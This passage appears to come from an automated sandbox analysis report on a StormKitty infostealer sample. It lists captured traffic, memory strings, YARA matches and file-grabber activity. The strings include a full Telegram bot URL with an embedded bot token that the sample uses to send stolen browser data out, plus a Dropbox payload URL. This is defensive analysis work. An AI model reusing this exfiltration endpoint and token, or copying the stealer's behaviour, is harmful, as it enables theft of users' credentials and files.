7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%201%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2a1a13562e73Host: api.telegram.orgContent-Length: 719778Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Tue, 31 Dec 2024 14:02:23 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 5d2a882728b44f62aa094ef004c939a7Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Tue, 31 Dec 2024 14:02:23 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 947f28207dc84e84a692c17684a10935Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Dec 2024 14:02:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missVary: Accept-EncodingX-Nf-Request-Id: 01JGEGCQ0AQGFSYG64EG5XWPT7cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G6DYbNS%2BZsnQV4bGdqnSoXR9SaqryZmoN4Yj3pk5jgfXF3drGSkGUfZATZMYrGSUkLSpqVRhfMV9h5gpl3Jp1UkHC1dFnlLPMhgTbBt2H9yot8erCMjoyZzD08ht"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8faace99591843a3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1701&rtt_var=665&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=678&delivery_rate=1611479&cwnd=223&unsent_bytes=0&cid=04cfa1171636af54&ts=231&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Tue, 31 Dec 2024 14:02:24 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 36e16ef689ef4f418eceb498fbca234cConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Tue, 31 Dec 2024 14:02:24 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: cc87dc52118048ac96fad570478049c3Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Tue, 31 Dec 2024 14:02:26 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: cdbb9211002d40c39d9da6e89b8af236Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Tue, 31 Dec 2024 14:02:26 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 70ecc19e4ade42d7a72614b63641b6d1Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Tue, 31 Dec 2024 14:02:27 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 69693b24d51b49a6a2e645da84f2f16aConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Tue, 31 Dec 2024 14:02:30 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: f36542c12631497398b626acedf89461Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Tue, 31 Dec 2024 14:02:31 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: fa1d76e50ec0476abdb137974b943ca9Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Tue, 31 Dec 2024 14:02:32 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: a363c16b9d214d7caf750f7eca4d571eConnection: close

Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000309B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000309B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000303F000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: vEtDFkAZjO.exe	String found in binary or memory: http://ip-api.com/xml
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000303F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/xmld
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000303F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.comd
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003047000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipif
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003047000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/d
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000307A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: vEtDFkAZjO.exe	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id==&caption=====
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6888669690:AAFyR7HkvXimINeLgRWgwb_Nn3tW88-uq1Y/sendDocument
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003068000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6888669690:AAFyR7HkvXimINeLgRWgwb_Nn3tW88-uq1Y/sendDocument?chat_id=
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000307A000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6888669690:AAFyR7HkvXimINeLgRWgwb_Nn3tW88-uq1Y/sendDocument?chat_id=%207
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgd
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.vimeworld.ru/user/name/
Source: vEtDFkAZjO.exe	String found in binary or memory: https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://assets.dropbox.com/www/en-us/illustrations/spot/traffic-u-turn.svg
Source: vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/images/favicon.ico
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css
Source: vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/s/n41axwfwvc7fb8d/image.png?dl=1
Source: vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://forums.dropbox.com
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://freegeoip.app/xml/
Source: vEtDFkAZjO.exe	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: vEtDFkAZjO.exe	String found in binary or memory: https://steamcommunity.com/profiles/ASOFTWARE
Source: places.raw.0.dr	String found in binary or memory: https://support.mozilla.org
Source: places.raw.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: places.raw.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/help
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/home
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/login
Source: vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: places.raw.0.dr	String found in binary or memory: https://www.mozilla.org
Source: places.raw.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: places.raw.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: History.txt.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
Source: tmp6AC0.tmp.dat.0.dr, places.raw.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: places.raw.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: tmp6AC0.tmp.dat.0.dr, places.raw.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: tmp6AC0.tmp.dat.0.dr, places.raw.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49727 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: vEtDFkAZjO.exe, Screen.cs

.Net Code: GetScreen

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File deleted: C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS\DVWHKMNFNN.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File deleted: C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS\DVWHKMNFNN.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File deleted: C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS\NWTVCDUMOB.pdf	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File deleted: C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS\YPSIACHYXW.jpg	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File deleted: C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS\YPSIACHYXW.jpg	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: vEtDFkAZjO.exe, type: SAMPLE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: vEtDFkAZjO.exe, type: SAMPLE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: vEtDFkAZjO.exe, type: SAMPLE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: vEtDFkAZjO.exe, type: SAMPLE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: vEtDFkAZjO.exe, type: SAMPLE	Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE	Matched rule: Detects A310Logger Author: ditekSHen
Source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: vEtDFkAZjO.exe PID: 6624, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Drops password protected ZIP file

Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
